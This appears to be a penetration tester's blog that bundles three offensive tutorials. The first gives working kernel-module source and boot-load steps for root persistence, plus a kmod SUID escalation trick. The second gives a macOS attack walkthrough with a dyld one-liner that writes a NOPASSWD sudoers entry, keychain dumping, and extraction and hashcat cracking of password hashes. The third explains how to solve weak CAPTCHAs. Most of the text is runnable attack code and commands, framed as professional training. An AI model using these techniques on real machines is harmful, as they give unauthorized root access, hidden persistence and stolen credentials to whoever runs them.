Establish Persistence with a Custom Kernel Module

First and foremost, I have to admit that establishing persistence with a custom kernel module isn't the most ideal approach. Creating kernel modules isn't easy: modules are normally compiled against a single kernel version, there are significant limitations on what can be done in kernel space, and errors can cause the system to freeze or crash. Regardless, I think it's a valuable learning experience that all Linux security professionals should go through. For a much easier way to maintain access to modern systems, check out my post on persistence with systemd timers.

As mentioned, kernel space capabilities are largely limited to dealing with files and devices on behalf of userspace applications. Since modules are loaded into the running kernel, it can be fairly difficult to write persistence code within a module that plays nicely with kernel space protections and the limited functionality available. Instead, we can leverage the kernel function call_usermodehelper to execute a userspace program on our behalf. Since by default only the root user can request that a module be loaded, this gives us command execution as root. In its simplest form, the source code for such a module, test_shell.c, would look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros
#include <linux/kmod.h>      // included for call_usermodehelper

MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{
    // argv[0] is conventionally the path of the program being executed
    char *argv[] = { "/tmp/exe", NULL };

    // Run the staged userspace program and wait for the exec to complete
    call_usermodehelper(argv[0], argv, NULL, UMH_WAIT_EXEC);
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Since kernel mode capabilities and libraries are so limited, we can further simplify the payload by staging it as a standard C application instead. This allows the module to attempt to execute the staged application as root and still return normally regardless of what happens. The source code for a simple C execution program, named exe.c, might look like the following.

#include <stdlib.h>

int main(void)
{
    // Harmless proof of execution; swap in whatever payload is needed
    system("wall \"Hello There Im a Module!\"");
    return 0;
}

If we don't want to stage a second executable to establish persistence with the custom kernel module, it's possible to create variables for the user's environment and command line arguments and pass them directly to the call_usermodehelper function. The module source code to do this might look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros
#include <linux/kmod.h>      // included for call_usermodehelper

MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{
    // A minimal root environment for the spawned process
    static char *envp[] = {
    "HOME=/",
    "TERM=linux",
    "USER=root",
    "SHELL=/bin/bash",
    "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
    NULL};

    // bash treats its first argument as a script file to run, so the
    // command must be passed via -c for it to execute as intended
    char *argv[] = {
    "/bin/bash",
    "-c",
    "wall \"Hello I'm a Module!\"",
    NULL};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
    printk(KERN_INFO "Installing Module!\n");
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Before compiling the module, you will need to be on the target system or a similar system with the same kernel version. You will also need all of the required tools for kernel development and the current kernel's header files. The easiest way to get them is to run 'apt-get install build-essential linux-headers-$(uname -r)' on Debian-based systems or 'yum install kernel-headers kernel-devel glibc-devel gcc gcc-c++ make' on Red Hat-based systems.
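
Broken out as commands:

# Debian-based systems: compiler toolchain plus headers for the running kernel
apt-get install build-essential linux-headers-$(uname -r)

# Red Hat-based systems
yum install kernel-headers kernel-devel glibc-devel gcc gcc-c++ make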

Once the build tools are installed, we can create a Makefile that hands the build off to kbuild (the kernel build system) to compile our module. Just keep in mind that kbuild will switch to the kernel source directory and only allows including headers from within the kernel source tree.

obj-m += test_shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=${PWD} modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=${PWD} clean

You can use a command like 'insmod test_shell.ko' to load the module directly into the kernel and 'rmmod test_shell' to remove it. This allows for easy testing of modules before configuring them to be loaded automatically at boot, as in the sketch below.
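
A quick test cycle might look like the following; dmesg is used to confirm the module's printk output reached the kernel ring buffer:

insmod test_shell.ko      # load the module; the payload should fire immediately
lsmod | grep test_shell   # confirm the module is resident
dmesg | tail              # check the ring buffer for the module's printk output
rmmod test_shell          # unload the module when done testing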

Once the module is compiled and tested successfully, we can copy it into the current kernel's modules directory.

cp test_shell.ko /lib/modules/`uname -r`/kernel/lib/

Next we need to run 'depmod' to rebuild the module dependency list and its binary index files. Without the dependency tree updated, the system won't know our module exists or how to load it into the kernel.

depmod -a 

If we are going to stage the second executable for the module to execute, we will also need to compile it with gcc like the following.

gcc exe.c -o /tmp/exe

To have the custom kernel module loaded at boot time, we need to modify the config files for either modprobe or kmod, depending on which the system uses. In most cases you can easily figure out if it's a kmod system by checking whether the standard module tools are just symbolic links to kmod. This can be done with a command like the following.

ls -al `which modprobe`
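
On a kmod system, the output will look something like the following (the exact paths vary by distribution; this output is illustrative):

lrwxrwxrwx 1 root root 9 Jun  1 12:00 /sbin/modprobe -> /bin/kmod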

If you do see that modprobe is just a symbolic link to kmod, getting a registered module to start at boot is fairly simple. Just place the name of the module, minus the .ko extension, in the /etc/modules config file. This can be done with a simple command like the following. It will cause the systemd-modules-load service to utilize kmod to automatically load the module on boot.

echo 'test_shell' >> /etc/modules

Interestingly, you can actually set the SUID bit on kmod so standard users can load modules as root, whereas if you set SUID on the legacy modprobe executable, module loading still happens in the user's own context instead. So simply setting SUID on the kmod executable can be an easy way to establish privilege escalation, similar to the dash shell trick I've blogged about before.
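
A sketch of what abusing that would look like, assuming kmod lives at /bin/kmod (verify with the symlink check above):

# As root: set the SUID bit on the kmod binary
chmod u+s /bin/kmod

# Later, as a standard user: module loads now happen as root
modprobe test_shell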

If it's not a kmod system, we can instead utilize modprobe to automatically start the custom module by creating a .conf file in the /etc/modprobe.d/ directory. The content of the .conf file should look similar to:

install test_shell

On modprobe systems, standard users can also request that a module be loaded if a valid configuration file already exists, but any code execution happens within the requesting user's context. Interestingly enough, you can have modprobe run a terminal command when the module is requested by appending the command to the end of the install statement in the config file; modprobe then runs that command in place of its normal module insertion. That could work as a persistence method as well, but there is no guarantee all filesystems are mounted or networking has been established when the module is loaded. A sketch of such a config follows.
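
A hypothetical example following the pattern documented in the modprobe.d man page, assuming the staged /tmp/exe payload from earlier ('--ignore-install' stops the install line from invoking itself recursively):

# /etc/modprobe.d/test_shell.conf: insert the module, then run the payload
install test_shell /sbin/modprobe --ignore-install test_shell && /tmp/exe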

With all that work complete, we have established persistence, at least until the kernel is updated.

Mac OSX Password Cracking


TL;DR: There are several ways to enumerate information from a Mac shell and to collect encrypted credentials for OSX password cracking.

Problem and Rationale

During a recent assessment, the client had close to 10,000 Mac OSX systems throughout their global presence. All of these Macs were authenticating to Active Directory and granted all logged-in users local admin rights via a misconfigured sudoers rule. Since this blog is lacking any real reference material specifically for OSX, I figured I would detail the information gathering and attacks I performed during the assessment.

Attacks and Methodology

The default base install of Apple OSX allows the primary user configured on that workstation to sudo to root. When Active Directory backed authentication is used, newly logged-in users can inherit the primary user role if the system defaults are not changed. This effectively makes all domain users local admins on all of the affected Macs. This is good news, since root level permission is required to pull local password hashes.

If the OSX systems do not use AD authentication, don't fret. By default the SSH server is enabled, and it does not have any lockouts on failed login attempts. If all else fails, physical attacks still work very well against OSX: just walk up to one and hold Command+S during boot to log into a single user root terminal. If the system isn't using full disk encryption, you can simply copy files over to a USB flash drive.

Once you have a terminal on a Mac, it's good to check user and group memberships. Again, if the user is part of the admin group, they can sudo by default; and if they are part of the wheel group, they are effectively root. The following is a list of useful commands to use when in a terminal:

dscl . -list /Users #List local users
dscl . -list /Groups #List local groups
dscl . -read /Groups/<Groupname> #List local group membership
dscl . -read /Users/<username> #List a user's information and settings

Note: The commands above all have a target of '.' or 'localhost'. If the system is connected to Active Directory, it can be queried in a similar manner. To list all Domain Admins, use the following command:

dscl /Active\ Directory/<domain>/<domain.local> -list /Groups/Domain\ Admins

If the user doesn't have sudo or root privileges, you can try to elevate to root with one of several local privilege escalation vulnerabilities. Some recent noteworthy options include CVE-2015-5889, CVE-2015-1130, or just abuse one of the Yosemite dynamic linker (dyld) environment variables like the following:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

If the device is up to date on its patches, about all one can do is some file pillaging. The two things I would note are that AppleScript (.scpt) and property list (.plist) files are very popular in OSX. Both file types are stored on disk as binary files, so they need to be converted back to ASCII to be human readable.
To view the contents of an AppleScript file, use a command like:

osadecompile logon.scpt

To convert a .plist file from binary to its native XML, use a command like:

plutil -convert xml1 /path/to/file.plist

Note: plutil converts files in place, so take care to make copies of the files you're working with. Alternatively, the plist files can be exfiltrated to Kali and converted to XML using the libplist-utils library. The conversion command might look something like this:

plistutil -i user.plist -o user.xml

If root level access is acquired, we can go straight after the local users' plist files. Each user's plist file contains their individual settings and their encrypted credentials. The directory that contains all local users' plist files is /private/var/db/dslocal/nodes/Default/users/.
If another user is currently logged into the system, that user's keychain can be dumped by root. This will provide clear text access to all saved credentials, iCloud keys, the FileVault encryption key, and the user's clear text password. To dump the user's keychain, use a security command like:

security dump-keychain -d /Users/<user>/Library/Keychains/login.keychain

WARNING: In newer versions of OSX this will generate a dialog box on the user’s screen. This will obviously alert the user and only produce usable output if the user accepts.

OSX Password Cracking

There are several ways to gain access to the encrypted shadow data needed to conduct OSX password cracking; two of them have already been mentioned above. If you have root access, perform a 'dscl . -read /Users/<user>', or grab the user's plist file from /private/var/db/dslocal/nodes/Default/users/ and convert it to XML. Either way, there will be an XML element called ShadowHashData. The ShadowHashData is a base64 encoded blob containing a plist file, which in turn holds the base64 encoded entropy, salt, and iterations.

Note: Before the base64 can be cleanly decoded in each of the steps below, the XML elements, spaces, and line breaks will need to be removed manually.
The first step is to extract the plist file from the shadow hash data and convert it back to XML. This can be done with the following commands:

echo "<hash data>" | base64 -D > shadowhash
file shadowhash
plutil -convert xml1 shadowhash

Next, clean up and convert the base64 encoded entropy to hex format. This can be done with the following commands:

echo "<entropy data>" | base64 -D > entropy
file entropy
xxd entropy

Third, clean up and convert the base64 encoded salt to hex format. This can be completed with the following set of commands:

echo "<salt data>" | base64 -D > salt
file salt
xxd salt
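
The iterations value needs no conversion; it is stored as a plain integer in the converted plist, so it can be read straight out of the shadowhash file (illustrative; the key sits under the SALTED-SHA512-PBKDF2 dictionary):

grep -A1 '<key>iterations</key>' shadowhash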

Next we can put the iterations value and the hex strings together into the following hashcat format (mode 7100).

$ml$<iterations>$<salt>$<entropy>

Lastly put that baby in hashcat as OSX v10.8/v10.9 and watch it burn.

./hashcat-cli64.app -m 7100 hash.txt wordlist.txt

As Always:

ICBfICAgXyAgICAgICAgICAgIF8gICAgICBfX19fXyBfICAgICAgICAgICAgX19fXyAgXyAgICAg
ICAgICAgICAgICAgIF8gICANCiB8IHwgfCB8IF9fIF8gIF9fX3wgfCBfXyB8XyAgIF98IHxfXyAg
IF9fXyAgfCAgXyBcfCB8IF9fIF8gXyBfXyAgIF9fX3wgfF8gDQogfCB8X3wgfC8gX2AgfC8gX198
IHwvIC8gICB8IHwgfCAnXyBcIC8gXyBcIHwgfF8pIHwgfC8gX2AgfCAnXyBcIC8gXyBcIF9ffA0K
IHwgIF8gIHwgKF98IHwgKF9ffCAgIDwgICAgfCB8IHwgfCB8IHwgIF9fLyB8ICBfXy98IHwgKF98
IHwgfCB8IHwgIF9fLyB8XyANCiB8X3wgfF98XF9fLF98XF9fX3xffFxfXCAgIHxffCB8X3wgfF98
XF9fX3wgfF98ICAgfF98XF9fLF98X3wgfF98XF9fX3xcX198

Decoding Weak CAPTCHAs


TL;DR: Weak CAPTCHA services utilized on the internet can be programmatically solved with a fairly high success rate.

Problem

A lot of firms, including mine, have begun to recommend that CAPTCHAs be used on all web forms which feed into existing business processes (registration pages, contact pages, etc). This recommendation can be a double-edged sword, because there are still several CAPTCHA services that utilize weak CAPTCHAs, which can be readily decoded with modern image analysis techniques. That being said, several individuals have asked if there is a systematic way to test the strength of a given CAPTCHA, to determine whether it's weak or not.

Solution

There are two major methodologies currently in wide use for decoding weak CAPTCHAs. The first technique is to remove the noise from CAPTCHA images by reversing the programmatic functions used to add visual abstractions, then simply compare each character to a set of known sample characters. This method relies heavily on evaluating each weak CAPTCHA service offering and creating reliable function sets to solve its individual CAPTCHAs. The best tool for using this technique to test for known weak CAPTCHA types is PWNtcha.

The second methodology uses vector based image analysis to compare each pixel's location to the expected location given each possible character. After consolidating all of these pixel location checks, each possible character is ranked based on its probability of being correct. The success of this method relies heavily on the use of a reference font, so if the reference font and the CAPTCHA's font are significantly different, the analysis won't go well. The best freely available tool I've found using this technique to test the strength of CAPTCHAs is captcha-decoder.

How to use

Unfortunately, almost every implementation of CAPTCHAs is going to be different enough to make web scraping a sample set of CAPTCHA images difficult. Thus the first step is always going to be downloading three to five CAPTCHA images for testing, as in the sketch below.
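
A minimal sketch of collecting samples, assuming the target serves a fresh image per request (the URL is a hypothetical placeholder):

for i in 1 2 3 4 5; do
    curl -s -o captcha_$i.png "https://target.example.com/captcha.png"
done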

Then we can run each image through pwntcha and see if it can identify the image as a known weak CAPTCHA type.

pwntcha <img>

Test run using PayPal's known weak CAPTCHA samples: 100/100

Test run of vBulletin's known weak CAPTCHA samples: 100/100

Last, we can run captcha-decoder on each of the sample images to try to get an idea of whether vector based analysis is going to be successful. You will have to use your best judgment once you receive the results to determine if the risk is high enough to create an issue. Generally, if all the correct letters are guessed with over 70% confidence, the CAPTCHA should be considered weak. However, an organization may believe 70% is too high and may have a much lower tolerance.

decaptcha <img or img url> --min 0 --max 20 --limit 5 --channels 5 --tolerance 7

Current font test image on mondor (a public API and web resource site)

So in this case, the variable boldness of the letters tricked the vector analysis into thinking the K was an X and the L was an I.

References

PWNtcha - http://caca.zoy.org/wiki/PWNtcha
PWNtcha known compiling issues - https://blog.bmonkeys.net/2014/build-pwntcha-on-ubuntu-14-04
Note: if you have an issue with bootstrap, edit the bootstrap file to include automake versions 13 and 14.
captcha-decoder - https://github.com/mekarpeles/captcha-decoder
Note: if you have an issue with installing, make sure the python-dev system package is installed.